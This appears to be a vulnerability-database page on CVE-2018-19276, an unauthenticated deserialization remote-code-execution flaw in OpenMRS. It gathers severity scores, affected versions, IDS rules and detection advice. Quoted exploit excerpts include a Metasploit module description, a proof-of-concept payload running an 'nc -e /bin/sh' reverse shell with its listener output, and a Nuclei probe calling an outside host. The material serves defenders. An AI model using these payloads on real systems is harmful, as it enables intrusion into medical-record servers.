CVE-2018-19276
published 2019-03-21CVE-2018-19276: OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the…
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
98.81%
99.9th percentile
OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openmrs | openmrs | >= 1.12.0 < 1.12.1 | 1.12.1 |
| openmrs | openmrs | >= 2.0.0 < 2.0.8 | 2.0.8 |
| openmrs | openmrs | >= 2.1.0 < 2.1.4 | 2.1.4 |
Detection & IOCsextracted from sources · hover to see the quote
commandsh -c <cmd> (via xml_data = "sh-c#{cmd}" POST to /ws/rest/v1/concept with Content-Type: text/xml)↗
othercom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; content:"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"; fast_pattern; reference:url,www.exploit-db.com/exploits/46327; reference:cve,2018-19276; classtype:attempted-admin; sid:2031259; rev:2; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2020_12_04, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, updated_at 2024_03_07, reviewed_at 2024_05_06;)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276"; flow:established,to_server; urilen:19; http.method; content:"POST"; http.uri; content:"/ws/rest/v1/concept"; fast_pattern; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; reference:url,www.rapid7.com/db/modules/exploit/multi/http/openmrs_deserialization; reference:cve,2018-19276; classtype:attempted-admin; sid:2030258; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2020_06_08, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_07;)
- →Detect exploit attempts by matching HTTP POST requests to URI /ws/rest/v1/concept (urilen:19) with XML body containing XStream deserialization gadget markers (e.g., java.lang.ProcessBuilder, com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data). ↗
- →Look for HTTP POST requests with Content-Type: text/xml to /ws/rest/v1/concept; the exploit sends XML with Content-Type text/xml rather than application/json. ↗
- →The server response to a successful (but caught) deserialization attempt contains the string 'Could not read [class org.openmrs.module.webservices.rest.SimpleObject]' and 'XStream unmarshalling exception'; monitor for this error in HTTP responses as evidence of exploitation attempts. ↗
- →The payload is deserialized before the exception handler catches it; a 500/error JSON response does NOT rule out successful RCE — monitor for outbound reverse shell connections (e.g., nc) from the OpenMRS/Tomcat process. ↗
- →The Metasploit module targets port 8081 by default; monitor for exploitation attempts on non-standard HTTP ports hosting OpenMRS. ↗
- →The exploit uses the ImageIO component of the XStream library as the deserialization gadget chain; look for XStream-related class names in POST body content to /ws/ endpoints. ↗
- →For nuclei-based detection, match DNS interaction via interactsh combined with application/json Content-Type and body containing 'message":' in response to a crafted POST, covering both /openmrs and root path variants.
- ·The vulnerability affects OpenMRS Platform versions before 2.24.0; versions v2.1.2 and v2.21 were confirmed exploitable in testing. ↗
- ·The vulnerability is in the `webservices.rest` module; if this module is disabled or not installed, the attack surface is removed. ↗
- ·Exploitation is unauthenticated — no credentials are required, making perimeter detection critical. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.010.0CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-785q-xwp9-2xw7: OpenMRS before 2
ghsa_unreviewed·2022-05-13
CVE-2018-19276 [CRITICAL] CWE-502 GHSA-785q-xwp9-2xw7: OpenMRS before 2
OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
VulnCheck
openmrs openmrs Deserialization of Untrusted Data
vulncheck·2018·CVSS 9.8
CVE-2018-19276 [CRITICAL] openmrs openmrs Deserialization of Untrusted Data
openmrs openmrs Deserialization of Untrusted Data
OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
Affected: openmrs openmrs
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-28&host_type=src&vulnerability=cve-2018-19276; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-29&host_type=src&vulnerability=c
Suricata
ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2
suricata·2020-12-04·CVSS 9.8
CVE-2018-19276 [CRITICAL] ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2
ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; content:"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"; fast_pattern; reference:url,www.exploit-db.com/exploits/46327; reference:cve,2018-19276; classtype:attempted-admin; sid:2031259; rev:2; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2020_12_04, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, updated_at 2024_03_07, reviewed_at 2024_05_06;)
Suricata
ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276
suricata·2020-06-08·CVSS 9.8
CVE-2018-19276 [CRITICAL] ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276
ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276"; flow:established,to_server; urilen:19; http.method; content:"POST"; http.uri; content:"/ws/rest/v1/concept"; fast_pattern; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; reference:url,www.rapid7.com/db/modules/exploit/multi/http/openmrs_deserialization; reference:cve,2018-19276; classtype:attempted-admin; sid:2030258; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2020_06_08, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_
Exploit-DB
OpenMRS - Java Deserialization RCE (Metasploit)
exploitdb·2019-12-18·CVSS 9.8
CVE-2018-19276 [CRITICAL] OpenMRS - Java Deserialization RCE (Metasploit)
OpenMRS - Java Deserialization RCE (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'OpenMRS Java Deserialization RCE',
'Description' => %q(
OpenMRS is an open-source platform that supplies
users with a customizable medical record system.
There exists an object deserialization vulnerability
in the `webservices.rest` module used in OpenMRS Platform.
Unauthenticated remote code execution can be achieved
by sending a malicious XML payload to a Rest API endpoint
such as `/ws/rest/v1/concept`.
This module uses an XML payload generated with Marshalsec
that targets the ImageIO component of the XStream library.
Tested on OpenMRS Platform `v2.1.2` and `v2.21` with J
Exploit-DB
OpenMRS Platform < 2.24.0 - Insecure Object Deserialization
exploitdb·2019-02-05·CVSS 9.8
CVE-2018-19276 [CRITICAL] OpenMRS Platform < 2.24.0 - Insecure Object Deserialization
OpenMRS Platform
0
false
0
/bin/sh
-c
nc -e /bin/sh 172.16.32.3 8000
false
java.lang.ProcessBuilder
start
foo
foo
false
0
0
false
false
0
The payload above was generated with the marshalsec tool and adapted to use multiple arguments because the original payload would not work well if the attacker need to send several arguments to a Linux host.. After the payload was sent, the handler successfully received a response:
~ » nc -vlp 8000
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 5DE4 9A26 3868 367D 8104 B043 CE14 BAD6 5CC9 DE51
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 172.16.32.2.
Ncat: Con
Metasploit
OpenMRS Java Deserialization RCE
metasploit
OpenMRS Java Deserialization RCE
OpenMRS Java Deserialization RCE
OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as `/ws/rest/v1/concept`. This module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library. Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9.
Nuclei
OpenMRS Platform < 2.24.0 - Insecure Object Deserialization
nuclei·CVSS 9.8
CVE-2018-19276 [CRITICAL] OpenMRS Platform < 2.24.0 - Insecure Object Deserialization
OpenMRS Platform
hashCode
curl{{interactsh-url}}
false
0
0
0
start
1337
payloads:
path:
- ""
- "/openmrs"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(content_type, "application/json")'
- 'contains(body, "message\":")'
condition: and
# digest: 4b0a004830460221009f8d39906061e2f6e09acf23e86f76f61644a9df50f267e82082738a7d17ad0a022100fc4fd6c7c38fb74a9c33fe238384f70375bb68ee637fbf04aa8ebf169a931526:922c64590222798bb761d5b6d8e72950
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
Threat Research Center
Threat Research
Vulnerabilities
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Threat Research
Vulnerabilities
IoT
Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While t
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/151553/OpenMRS-Platform-Insecure-Object-Deserialization.htmlhttp://packetstormsecurity.com/files/155691/OpenMRS-Java-Deserialization-Remote-Code-Execution.htmlhttps://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserializationhttps://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607https://www.exploit-db.com/exploits/46327/http://packetstormsecurity.com/files/151553/OpenMRS-Platform-Insecure-Object-Deserialization.htmlhttp://packetstormsecurity.com/files/155691/OpenMRS-Java-Deserialization-Remote-Code-Execution.htmlhttps://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserializationhttps://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607https://www.exploit-db.com/exploits/46327/
2019-03-21
Published
Exploited in the wild